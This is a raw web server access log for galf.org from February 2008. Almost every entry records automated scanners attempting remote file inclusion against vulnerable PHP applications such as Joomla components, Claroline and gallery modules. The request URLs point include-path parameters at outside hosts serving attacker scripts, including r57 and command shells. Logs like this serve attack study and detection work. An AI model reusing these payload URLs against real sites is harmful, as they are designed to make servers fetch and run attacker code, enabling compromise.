74.54.50.73 - - [24/Feb/2008:17:51:42 -0800] "GET /logs/access_080114.log/modules/My_eGallery/index.php?basepath=http://www.chevirex.eu/orange/contenido/external/frontend/logs/default/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.216.216.229 - - [24/Feb/2008:17:52:21 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.248.101.69 - - [24/Feb/2008:17:52:29 -0800] "GET /logs/access_080114.log//claroline/phpbb/page_tail.php?includePath=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.248.101.69 - - [24/Feb/2008:17:52:29 -0800] "GET /logs/access_080114.log//claroline/phpbb/page_tail.php?includePath=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.248.101.69 - - [24/Feb/2008:17:52:30 -0800] "GET //claroline/phpbb/page_tail.php?includePath=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.248.101.69 - - [24/Feb/2008:17:52:30 -0800] "GET //claroline/phpbb/page_tail.php?includePath=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.248.101.69 - - [24/Feb/2008:17:52:35 -0800] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.248.101.69 - - [24/Feb/2008:17:52:35 -0800] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.35.229.7 - - [24/Feb/2008:17:53:04 -0800] "GET /logs/access_080114.log/includehttp://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.35.229.7 - - [24/Feb/2008:17:53:04 -0800] "GET /includehttp://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.35.229.7 - - [24/Feb/2008:17:53:04 -0800] "GET /logs/includehttp://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.226.103.41 - - [24/Feb/2008:17:53:45 -0800] "GET /logs/access_080114.log/includehttp://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.226.103.41 - - [24/Feb/2008:17:53:45 -0800] "GET /includehttp://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.226.103.41 - - [24/Feb/2008:17:53:46 -0800] "GET /logs/includehttp://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.194.67.52 - - [24/Feb/2008:17:53:49 -0800] "GET /logs/access_070709.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
82.194.67.52 - - [24/Feb/2008:17:53:49 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.191.43.42 - - [24/Feb/2008:17:53:56 -0800] "GET /logs/access_080114.log/includehttp://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.191.43.42 - - [24/Feb/2008:17:53:56 -0800] "GET /includehttp://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.191.43.42 - - [24/Feb/2008:17:53:56 -0800] "GET /logs/includehttp://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.117.225.155 - - [24/Feb/2008:17:54:29 -0800] "GET /logs/access_071014.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.117.225.155 - - [24/Feb/2008:17:54:29 -0800] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.117.225.155 - - [24/Feb/2008:17:54:29 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
194.146.225.160 - - [24/Feb/2008:17:54:45 -0800] "GET /logs/access_070709.log/index.php?u=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.146.225.160 - - [24/Feb/2008:17:54:45 -0800] "GET /index.php?u=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.146.225.160 - - [24/Feb/2008:17:54:45 -0800] "GET /logs/index.php?u=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.91.228.154 - - [24/Feb/2008:17:55:14 -0800] "GET /logs/access_071014.log//skin/zero_vote/error.php?dir=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
81.91.228.154 - - [24/Feb/2008:17:55:15 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
205.234.132.157 - - [24/Feb/2008:17:56:19 -0800] "GET /logs/access_070917.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.23.229.105 - - [24/Feb/2008:17:56:48 -0800] "GET /logs//components/com_pollxt/languages/germani.php?mosConfig_absolute_path=http://www.leonenmarije.nl/////////////modules/isis.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "galf.org"
81.23.229.105 - - [24/Feb/2008:17:56:48 -0800] "GET //components/com_pollxt/languages/germani.php?mosConfig_absolute_path=http://www.leonenmarije.nl/////////////modules/isis.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "galf.org"
83.226.103.41 - - [24/Feb/2008:17:57:21 -0800] "GET /logs/access_070917.log/includehttp://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.35.229.7 - - [24/Feb/2008:17:57:27 -0800] "GET /logs/access_070917.log/includehttp://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.191.43.42 - - [24/Feb/2008:17:57:35 -0800] "GET /logs/access_070917.log/includehttp://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.212.114.250 - - [24/Feb/2008:17:58:11 -0800] "GET /logs/access_080114.log/includehttp://zezaku.extra.hu/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.212.114.250 - - [24/Feb/2008:17:58:12 -0800] "GET /includehttp://zezaku.extra.hu/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.212.114.250 - - [24/Feb/2008:17:58:13 -0800] "GET /logs/includehttp://zezaku.extra.hu/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.169.155.140 - - [24/Feb/2008:17:59:15 -0800] "GET /logs/access.log/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
70.169.155.140 - - [24/Feb/2008:17:59:16 -0800] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
70.169.155.140 - - [24/Feb/2008:17:59:16 -0800] "GET /logs/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
190.11.14.84 - - [24/Feb/2008:18:01:51 -0800] "GET /logs/access_071014.log//skin/zero_vote/error.php?dir=http://www.mahpushane.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
190.11.14.84 - - [24/Feb/2008:18:01:51 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.mahpushane.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
194.79.75.195 - - [24/Feb/2008:18:02:49 -0800] "GET /logs/access_071014.log/index.php?option=com_htmlarea3_xtd-c&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
194.79.75.195 - - [24/Feb/2008:18:02:49 -0800] "GET /logs/index.php?option=com_htmlarea3_xtd-c&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
222.239.78.91 - - [24/Feb/2008:18:02:50 -0800] "GET /logs/access_071014.log/index.php?arquivo=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
222.239.78.91 - - [24/Feb/2008:18:02:51 -0800] "GET /index.php?arquivo=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
222.239.78.91 - - [24/Feb/2008:18:02:51 -0800] "GET /logs/index.php?arquivo=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
206.33.2.131 - - [24/Feb/2008:18:02:52 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.177.226.178 - - [24/Feb/2008:18:02:54 -0800] "GET /logs/access_070917.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
82.194.67.52 - - [24/Feb/2008:18:03:03 -0800] "GET /logs/access_070917.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.177.226.178 - - [24/Feb/2008:18:03:41 -0800] "GET /logs/scripts.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
201.234.204.210 - - [24/Feb/2008:18:04:25 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://edzzard.webcindario.com/undetect.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.220.191.9 - - [24/Feb/2008:18:05:01 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
61.220.191.9 - - [24/Feb/2008:18:05:02 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
61.220.191.9 - - [24/Feb/2008:18:05:02 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
66.11.119.180 - - [24/Feb/2008:18:05:41 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
66.11.119.180 - - [24/Feb/2008:18:05:42 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
66.11.119.180 - - [24/Feb/2008:18:06:01 -0800] "GET /logs/access_070917.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.11.119.180 - - [24/Feb/2008:18:06:01 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
61.220.191.9 - - [24/Feb/2008:18:06:03 -0800] "GET /logs/access_070917.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.220.191.9 - - [24/Feb/2008:18:06:04 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.212.114.250 - - [24/Feb/2008:18:06:50 -0800] "GET /logs/access_070917.log/includehttp://zezaku.extra.hu/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.233.34 - - [24/Feb/2008:18:08:42 -0800] "GET /logs/access_071014.log/tools/send_reminders.php?noSet=0&includedir=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.18.233.34 - - [24/Feb/2008:18:08:43 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.18.233.34 - - [24/Feb/2008:18:08:43 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.44.72.170 - - [24/Feb/2008:18:10:46 -0800] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/dkyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
62.44.72.170 - - [24/Feb/2008:18:10:47 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/dkyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
62.44.72.170 - - [24/Feb/2008:18:10:47 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/dkyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
194.79.75.195 - - [24/Feb/2008:18:12:09 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.212.164.34 - - [24/Feb/2008:18:13:05 -0800] "GET /logs/access_080114.log/akocomments.php?mosConfig_absolute_path=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.212.164.34 - - [24/Feb/2008:18:13:05 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.212.164.34 - - [24/Feb/2008:18:13:05 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.248.101.69 - - [24/Feb/2008:18:14:41 -0800] "GET /logs/access.log//claroline/phpbb/page_tail.php?includePath=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
87.106.9.138 - - [24/Feb/2008:18:14:44 -0800] "GET //index2.php?pagina=http://canalpt.net/catalog/images/12.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.248.101.69 - - [24/Feb/2008:18:14:46 -0800] "GET /logs/access.log//claroline/phpbb/page_tail.php?includePath=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
89.248.101.69 - - [24/Feb/2008:18:14:47 -0800] "GET //claroline/phpbb/page_tail.php?includePath=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
89.248.101.69 - - [24/Feb/2008:18:14:47 -0800] "GET //claroline/phpbb/page_tail.php?includePath=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
89.248.101.69 - - [24/Feb/2008:18:14:47 -0800] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
89.248.101.69 - - [24/Feb/2008:18:14:52 -0800] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
87.106.9.138 - - [24/Feb/2008:18:15:56 -0800] "GET //index2.php?pagina=http://canalpt.net/catalog/images/12.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
72.30.214.235 - - [24/Feb/2008:18:15:57 -0800] "GET /logs/access_070917.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
208.80.120.172 - - [24/Feb/2008:18:18:20 -0800] "GET /logs/access.log/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
208.80.120.172 - - [24/Feb/2008:18:18:20 -0800] "GET /index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
208.80.120.172 - - [24/Feb/2008:18:18:20 -0800] "GET /logs/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
67.212.164.34 - - [24/Feb/2008:18:19:33 -0800] "GET /logs/access_070917.log/akocomments.php?mosConfig_absolute_path=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.179.98 - - [24/Feb/2008:18:19:40 -0800] "GET /logs/access_080114.log/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.179.98 - - [24/Feb/2008:18:19:40 -0800] "GET /import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.179.98 - - [24/Feb/2008:18:19:40 -0800] "GET /logs/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.80.120.172 - - [24/Feb/2008:18:20:34 -0800] "GET /logs/access_070917.log/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.80.120.172 - - [24/Feb/2008:18:20:34 -0800] "GET /index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.80.120.172 - - [24/Feb/2008:18:20:34 -0800] "GET /logs/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.200.246.89 - - [24/Feb/2008:18:21:05 -0800] "GET /import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
209.200.246.89 - - [24/Feb/2008:18:21:05 -0800] "GET /logs/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
81.169.132.236 - - [24/Feb/2008:18:21:13 -0800] "GET //modules/My_eGallery/public/displayCategory.php?adminpath=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.89.137.99 - - [24/Feb/2008:18:21:43 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
81.89.137.99 - - [24/Feb/2008:18:21:43 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
163.191.85.7 - - [24/Feb/2008:18:22:05 -0800] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
163.191.85.7 - - [24/Feb/2008:18:22:05 -0800] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
163.191.85.7 - - [24/Feb/2008:18:22:05 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
66.135.33.135 - - [24/Feb/2008:18:23:30 -0800] "GET //modules/My_eGallery/public/displayCategory.php?adminpath=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.106.9.138 - - [24/Feb/2008:18:24:04 -0800] "GET /index.php?go=http://canalpt.net/catalog/images/12.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.135.33.135 - - [24/Feb/2008:18:24:32 -0800] "GET /logs/access_070709.log//modules/My_eGallery/public/displayCategory.php?adminpath=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.135.33.135 - - [24/Feb/2008:18:24:32 -0800] "GET //modules/My_eGallery/public/displayCategory.php?adminpath=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.135.33.135 - - [24/Feb/2008:18:24:32 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?adminpath=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
163.191.85.7 - - [24/Feb/2008:18:24:52 -0800] "GET /logs/access_080114.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
163.191.85.7 - - [24/Feb/2008:18:24:52 -0800] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
163.191.85.7 - - [24/Feb/2008:18:24:52 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.135.33.135 - - [24/Feb/2008:18:25:33 -0800] "GET /logs/access_080114.log//modules/My_eGallery/public/displayCategory.php?adminpath=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.87.60.4 - - [24/Feb/2008:18:26:02 -0800] "GET //modules/My_eGallery/public/displayCategory.php?adminpath=http://www.zuuniimedee.mn//modules/My_eGallery/data/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
163.191.85.7 - - [24/Feb/2008:18:26:36 -0800] "GET /logs/access_080114.log//agendax/addevent.inc.php?agendax_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
163.191.85.7 - - [24/Feb/2008:18:26:36 -0800] "GET //agendax/addevent.inc.php?agendax_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
163.191.85.7 - - [24/Feb/2008:18:26:36 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://sportzradio.com/poll/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.144.55.219 - - [24/Feb/2008:18:26:58 -0800] "GET //modules/My_eGallery/public/displayCategory.php?adminpath=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.9.138 - - [24/Feb/2008:18:27:58 -0800] "GET /logs/access_080114.log//index2.php?pagina=http://canalpt.net/catalog/images/12.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.9.138 - - [24/Feb/2008:18:27:58 -0800] "GET /logs//index2.php?pagina=http://canalpt.net/catalog/images/12.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.22.31 - - [24/Feb/2008:18:28:54 -0800] "GET /logs/access_080114.log/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.22.31 - - [24/Feb/2008:18:28:57 -0800] "GET /import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.22.31 - - [24/Feb/2008:18:28:58 -0800] "GET /logs/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
